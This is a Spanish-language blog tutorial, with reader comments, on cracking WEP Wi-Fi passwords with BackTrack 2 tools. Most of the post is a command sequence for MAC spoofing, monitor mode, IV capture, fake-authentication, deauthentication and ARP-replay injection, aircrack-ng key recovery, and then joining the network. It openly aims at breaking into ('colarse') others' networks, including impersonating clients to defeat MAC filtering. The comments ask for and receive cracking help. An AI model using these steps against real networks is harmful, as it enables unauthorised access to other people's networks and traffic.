Blogia
Angel

Analisis de contraseñas de redes con Back Track 2

Podemos trabajar directamente desde el CD sin instalar el Back Track 2, pero alguno de los procesos necesarios para piratear redes como el airmon necesitan guardar archivos, para luego trabajar con ellos, asique necesitaríamos montar alguna partición o disco extraible para poder trabajar en el. Para ello: Montar/Desmontar dispositivos

 

Login: root toor (por ejemplo)
#starx

Empezamos entorno grafico:(Pero trabajaremos por terminal)
Tener cuidado ya que el teclado estara configurado en USA
#df -Th dice las particiones que tengo
Deveriamos introducirnos en alguna de las particiones y trabajar sobre ella creando una carpeta para guardar alli las aplicaciones.

Averiguaremos de que targeta disponemos con #iwconfig #ifconfig (targeta que nos diga $iwconfig, consideraremos que es ra0)
La apagaremos #ifconfig ra0 down
Cambiaremos la mac(solo mientras se encuentre encendido el pc en esta sesion) (se puede hacer por ifconfig....pero....)
#macchanger --help
#macchanger --mac=00:11:22:33:44:55 ra0
La encenderemos #ifconfig ra0 up

#airmon-ng muestra la lista de targetas y los drivers asociados a estas targetas
#airmon-ng start ra0 modo monitor a la targeta(escuchar todo, aunque no vaya a ella)

#airodump-ng muestra por pantalla puntos de acceso disponibles, y sus clientes asociados a ellos
#airodump-ng ra0 BSSID(mac),PWR(potencia con la que te llega),Beacons(faros, solo afecta en lo que vaya a tardar en aparecernos en la lista de redes disponible),#Data(paquetes con vectores de iniciacion(los que registraremos con la opcion -ivs)),MB(megabytes por segundo de la inalambrica(no tiene que ver con su conexion a internet), ENC(OPN=abierta,WPA,WEB,?=no lo tiene claro),ESSID(nombre del puesto),STATION(mac del cliente)
Si donde nos colamos tiene filtrado mac devemos ver a algun cliente, y cuando no este conectado suplantarlo.
Para capturar solo los paquetes con devilidad criptografica con los que trabajaremos:
#airodump-ng --ivs --write (nombrefichero) --channel (nºcanal)
Necesitamos 2millones de ivs para obtener buenos resultados, en total deven ocupar menos de 40MB...si vemos que los genera muy lentamente tenemos que forzar la aparicion de trafico, para ello en otra ventana hacemos esto:
#aireplay-ng
#aireplay-ng --fakeauth 30 -e iesciervaC14 -a 00:20:a6:50:26:d0 fakeauth es el tiempo ciclico con el que se conecta de nuevo en segundos, e es el punto de acceso al que nos conectamos, a es la BSSID de dicha targeta(mac)
Si no nos aceptasen el trafico generado lo que haremos sera a un usuario que veamos conectado le desautentificariamos una y otra vez, que igualmente generara el trafico que deseamos, = que si nosotros produgeramos el trafico:
#aireplay-ng -0 .... (-0 en vez de --fakeauth)(buscar + info)

#aireplay --arpreplay -e (nombretargeta) -a (BSSID) -b (BSSID) -h (nuestramac) -x (veces/s) ra0
-arpreplay es el tipo de ataque, -a y -b uno es un filtro y el otro la targeta a la que atacas, -x son las vees por segundo que lo reintentara

Cuando tengamos suficientes ivs usaremos la orden:
#aircrack-ng
#aircrack-ng -a 1 -b ((BSSID) mac punto de acceso) *.ivs
Se puede ejecutar antes de terminar la captura, puede cortarse, pero con relanzarlo basta.
Te dara la contraseña en hexadecimal y en texto.

Sacamos la targeta de modo monitor #airmon-ng stop ra0
Para conectarse con la contraseña obtenida #iwconfig key s:(contraseña de texto) ra0
o #iwconfig key (contraseña hexadecimal) ra0

Falta la IP y tal, se suele configurar con #dhclient ra0, pero si no funciona tenemos que poner a mano al ruter la mascara,IP....para ello tendriamos que averiguar en que subred nos encontraremos, con wireshark porejemplo.

Para desencriptar IPs mediante wireshark:
Opciones>Protocolo>802.11>keys (introducimos la contraseña obtenida)
La maquina que más recivira sera el router ya que todo pasa por el.


aircrack-ptw 1.0.0 en vez de usar .ivs usa .cap, por lo que en la orden de captura de trafico tendriamos que omitir el --ivs.

La gente suele usar siempre las mismas contraseñas simples, por lo que diccionarios pequeños de contraseñas pueden ser muy efectivos, unos muy buenos son aspell y myspell, ambos en ingles y español.

Atacando redes WEP si tienen autentificacion de shared key es facil descifrarlo mediante ataques chopchop o defragmentacion.

6 comentarios

Angel -

Depende.
Si tienes esos routers para que solo se puedan conectar ciertas direcciones hasta que no se conecte ninguna de esas direcciones, y alguien pueda copiar su identidad para usarla luego, no podrán colarse por ai.
Pero si lo tienes abierto, o con contraseña, pero sin restricciones de acceso, cualquiera que descifre la contraseña se puede colar (se puede ir probando contraseñas hasta que una cuele, pero se tarda mucho tiempo)

Francisco -

Muy bueno, tengo una duda aireplay no me funciona solo tengo que esperar con mucha paciencia juntar IVs ya logre decifrar una contraseña juntando IVs pero tengo algunos router que nunca se conecta nadie esos no se pueden obtener contraseñas?

Angel -

Para mi back track es el metodo más facil, aunque hay multitud de programas de desencriptación wireless, back track lo hace más facil reuniendo varias de esas herramientas, otra compilación muy usada es wifi slax.

http://www.wifislax.com/

merlin -

y en modo grafico como le hago para ver si crackear wireles?algo mas facil.te lo agradesco

Angel -

El tutorial es más que suficiente para desencriptar una red sencilla, para redes avanzadas puede funcionar, pero recomiendo buscar tutoriales de wireshark, ataques por defragmentación, y diccionarios avanzados.

Miguel -

Muy bueno el tutorial, pero muy lineal,¿Para que sirve cada cosa, y que se hace si algo sale diferente?